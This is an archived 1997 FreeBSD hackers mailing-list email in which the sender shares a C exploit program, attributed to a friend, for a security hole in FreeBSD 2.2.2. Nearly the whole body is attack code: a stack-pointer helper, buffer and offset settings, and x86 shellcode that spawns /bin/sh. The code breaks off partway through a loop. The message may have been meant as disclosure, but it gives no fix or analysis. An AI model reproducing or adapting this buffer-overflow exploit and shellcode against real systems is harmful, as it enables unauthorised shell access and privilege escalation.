From owner-freebsd-hackers Mon Aug 4 08:11:46 1997
Return-Path:
Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id IAA05049 for hackers-outgoing; Mon, 4 Aug 1997 08:11:46 -0700 (PDT)
Received: from server.netplus.com.br (root@[200.247.23.97]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id IAA05040 for ; Mon, 4 Aug 1997 08:11:39 -0700 (PDT)
Received: from sergio.lenzi (dial11.netplus [192.168.9.18]) by server.netplus.com.br (8.8.5/8.8.5) with ESMTP id MAA23708 for ; Mon, 4 Aug 1997 12:13:21 GMT
Received: from localhost (lenzi@localhost) by sergio.lenzi (8.8.5/8.8.5) with SMTP id KAA06331 for ; Mon, 4 Aug 1997 10:12:20 GMT
X-Authentication-Warning: sergio.lenzi: lenzi owned process doing -bs
Date: Mon, 4 Aug 1997 10:12:18 +0000 (GMT)
From: "Lenzi, Sergio"
X-Sender: lenzi@sergio
To: hackers@freebsd.org
Subject: Security hole script.
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-hackers@freebsd.org
X-Loop: FreeBSD.org
Precedence: bulk

Hello all.

Here is the "script" that opens a hole in our FreeBSD 2.2.2...
from a friend of mine (lgarcia@netlan.com.br)

---------------------------cut-------------------------------
#include
#include
#include

#define BUFFER_SIZE 1400
#define OFFSET 600

char *get_esp(void)
{
    asm("movl %esp,%eax");
}

char buf[BUFFER_SIZE];

main(int argc, char *argv[])
{
    int i;
    char execshell[] =
        "\xeb\x23\x5e\x8d\x1e\x89\x5e\x0b\x31\xd2\x89\x56\x07\x89\x56\x0f"
        "\x89\x56\x14\x88\x56\x19\x31\xc0\xb0\x3b\x8d\x4e\x0b\x89\xca\x52"
        "\x51\x53\x50\xeb\x18\xe8\xd8\xff\xff\xff/bin/sh\x01\x01\x01\x01"
        "\x02\x02\x02\x02\x03\x03\x03\x03\x9a\x04\x04\x04\x04\x07\x04";

    for(i=0+1;i